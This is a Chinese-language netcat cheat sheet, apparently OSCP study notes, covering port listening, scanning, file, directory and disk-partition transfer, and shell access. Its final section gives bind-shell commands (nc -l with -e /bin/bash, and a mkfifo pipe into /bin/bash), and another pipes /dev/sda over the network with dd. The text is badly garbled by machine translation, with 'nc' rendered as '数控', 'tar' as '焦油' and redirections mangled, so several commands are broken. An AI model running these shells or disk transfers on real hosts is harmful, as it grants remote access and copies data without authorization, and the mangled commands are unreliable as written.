功能
<代码> 1。监听本地端口 2. 连接目标端口 3.传送文件 4. 远程管理与Netcat (OSCP中给的分类,不知道此分类的作用,需要深入学习) 5. 反弹外壳 6. 测两台机器间的网速代码>
监听本地端口
<代码类=" language-bash "> #临时监听端口 nc - l & lt; PORT>#临时监听TCP端口一次 nc - lu & lt; PORT>#临时监听UDP端口 #以监听TCP端口为例,监听UDP端口基本一样代码>
<>强服务器端<强> 临时 >强监听端口强>
<代码>数控路& lt; PORT>#永久监听TCP端口 数控-lku & lt; PORT>#永久监听UDP端口 #永久监听:监听端口,并且客户端端来连接时,服务器端依旧监听等待连接,并且支持多客户端同时连接.UDP端口类似。代码>
连接目标端口
<代码类=" language-bash "> #在监听部分可以找到连接的图,接下来重点操作一下端口扫描;数控扫描端口会创建TCP三次握手连接,会造成一定的流量,容易被发现。 数控& lt; IP>& lt; PORT>,#连接目标TCP端口 nc - u & lt; IP>& lt; PORT>#连接目标UDP端口 #使用上述命令连接tcp或UDP端口,连接成功后会阻塞在用户输入中,让用户与目标端口进行交互。此外还有一种非交互模式,适合用来扫描端口。 nc - z & lt; IP>& lt; PORT>#扫描目标TCP端口 数控祖茂堂& lt; IP>& lt; PORT>#扫描目标UDP端口 #,- w参数的适用场景:扫描UDP端口,网络状况不好。在网络状况良好是,扫描TCP端口没有必要使用此参数。 nc - z w1 & lt; IP>& lt; PORT>代码范围>
传送文件
<代码>此部分需要两台机器的配合 机:数据存储机器 B机:备份机器代码>
<强> TCP传送文件强>
<代码类=" language-bash "> B: nc - l & lt; PORT>比;文件名 答:数控& lt; IP>& lt; PORT>& lt;文件名 文件传送完成后,连接自动断开代码>
<强> UDP传送文件强>
<代码类=" language-bash "> # B nc - lu & lt; PORT>比;文件名 #一个 nc - u & lt; IP>& lt; PORT>& lt;文件名 #文件传输完成后,连接不会断开,可反复连接B机进行文件传输。 # UDP更适合做一个日志接受端,其他的机器都把通过数控把日志写入到监听的UDP机器上代码>
#传送目录与传送文件是一样的,只是通过焦油将目录打包为压缩文件传过去并自定焦油解包,实现传送目录的功能 # B nc - l & lt; PORT>| tar zxvf - #一个 焦油zcf - * |数控& lt; IP>& lt; PORT> 代码>
<强>传送分区强>
<代码类=" language-bash "> B: nc - l & lt; PORT>|=/dev/sda的dd 答:dd如果=/dev/sda |数控& lt; IP>& lt; PORT> 代码>
反弹外壳
<代码类=" language-bash "> #数控有- e选项时 #服务器 nc - l & lt; PORT>- e/bin/bash -我 #客户 数控& lt; IP>& lt; PORT> 代码>
<代码类=" language-bash "> #数控没有- e选项时,创建正向壳 #服务器 mkfifo/tmp/先进先出,,猫/tmp/fifo |/bin/bash - 2祝辞,1 | nc - l & lt; PORT>比;/tmp/先进先出 #客户 数控& lt; IP>& lt; PORT>ncat使用汇总